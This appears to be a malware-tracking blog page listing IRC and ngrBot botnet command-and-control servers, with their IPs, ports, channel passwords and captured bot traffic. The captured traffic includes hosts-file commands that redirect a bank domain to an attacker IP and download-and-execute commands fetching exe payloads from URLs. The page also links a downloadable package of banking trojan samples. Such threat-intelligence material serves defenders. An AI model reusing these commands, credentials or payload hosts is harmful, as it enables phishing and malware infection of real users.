Remote Host Port Number 193.107.19.60 1863 NICK {XPUSA919273} JOIN #per PRIVMSG #per : 14,1. 15:: [HOST] adido Host: 3,1 echo 69.64.58.90 www.viabcp.com >> %windir%system32driversetchosts 3,1 echo 69.64.58.90 viabcp.com >> %windir%system32driversetchosts USER COMPUTERNAME * 0 :COMPUTERNAME MODE {XPUSA919273} -ix Now talking in #per Topic On: [ #per ] [ .host.add 69.64.58.90 www.viabcp.com|.host.add 69.64.58.90 viabcp.com ] TopicRead more...
d.xludakx.com(ngrBot hosted in Netherlands Amsterdam Leaseweb B.v )
This NgrBotnet conect to 3 domains and is aproximatly 100k: Resolved : [d.xludakx.com] To [95.211.165.62] Resolved : [ab.0n3mmm.com] To [95.211.165.62] Resolved : [ab.0n3mmm.com] To [178.33.143.52] Resolved : [ab.0n3mmm.com] To [109.75.176.231] Resolved : [pusikuracbre.com] To [95.211.165.62] Remote Host Port Number 199.15.234.7 80 95.211.165.62 4949 PASS ngrBot 109.75.176.231 4949 PASS ngrBot 178.33.143.52 4949 PASS ngrBot ab.0n3mmm.com +666Read more...
193.107.16.22(irc botnet hosted in Seychelles Ideal Solution Ltd)
Server: 193.107.16.22:8718 nick: pSLXmPY user: wqvryekc chanel: #c Now talking in #c Topic On: [ #c ] [ =dOgdsa09MhlSUc9X89Kr0zVOWZeVEgEv3wA1/TshQtxNUaWqoxiIxkURBNl9r/5JGhteretdAQXvU1kBsZEpDZNZJfkv ] Topic By: [ r ] hosting infos: http://whois.domaintools.com/193.107.16.22
80.79.112.66(ngrBot hosted in Estonia Tallinn Aktsiaselts Wavecom)
Remote Host Port Number 109.68.190.217 80 199.15.234.7 80 80.79.112.66 5749 PASS axplm2 NICK n{US|XPa}psbmdzo USER psbmdzo 0 0 :psbmdzo JOIN #chat Amx4k PRIVMSG win7elite :[d=”http://109.68.190.217/alms22.exe” s=”150528 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataScxaxs.exe” – Download retries: 0 exe file: Download Download hosting infos: http://whois.domaintools.com/80.79.112.66
67Mb Malware Samples
This package have alot of irc bot and banking trojans samples inside have fun exploring samples Download Download
Virus.Win32.Nimnul.a( Malware hosted in United States Network Operations Center Inc)
Hosted in USA also called Ramnit by other antiviruses what this malware does: Capability to send out email message(s) with the built-in SMTP client engine. Produces outbound traffic. Communication with a remote SMTP server and sending out email. Downloads/requests other files from Internet. Compromises SafeBoot registry key(s) in an attempt to disable the Safe Mode.Read more...
87.76.29.62(irc botnet hosted in United Kingdom Future Hosting Llc)
Remote Host Port Number 199.15.234.7 80 87.76.29.62 4443 NICK New{US-XP-x86}3443373 USER 3443373 “” “3443373” :3443373 MODE New{US-XP-x86}3443373 +iMm JOIN #new PONG 422 hosting infos: http://whois.domaintools.com/87.76.29.62
119.59.99.160(irc botnet hosted in Thailand Bangkok 453 Ladplacout Jorakhaebua)
Remote Host Port Number 119.59.99.160 2345 NICK New[USA|00|P|98932] PRIVMSG #!loco! :[M]: Thread Disabled. PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email. USER XP-6625 * 0 :COMPUTERNAME MODE New[USA|00|P|98932] -ix JOIN #!loco! PONG 22 MOTD Now talking in #!loco! Topic On: [ #!loco! ] [ .m.s|.m.e Foto http://goo.gl/JfWS5?= ] Topic By: [ wd11 ] hostingRead more...
timununyeri.co.cc(irc botnet hosted in Turkey Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti)
timununyeri.co.cc 94.102.0.65 Opened listening TCP connection on port: 113 C&C Server: 94.102.0.65:6667 Server Password: Username: arpsc Nickname: DEU|43304 Channel: #hack (Password: timu) Channeltopic: : Now talking in #hack Topic On: [ #hack ] [ .dl http://www.osmarimoveis-rs.com.br/ex.exe c:/ex.exe 1 ] Topic By: [ infeCTeD ] hosting infos: http://whois.domaintools.com/94.102.0.65
174.140.165.107(irc botnet hosted in United States Portland Directspace Networks Llc)
Remote Host Port Number 174.140.165.107 6667 PASS mystic NICK New{US-XP-x86}4733047 USER 4733047 “” “4733047” :4733047 MODE New{US-XP-x86}4733047 +iMm JOIN #Boss PONG :Mystical.gov hosting infos: http://whois.domaintools.com/174.140.165.107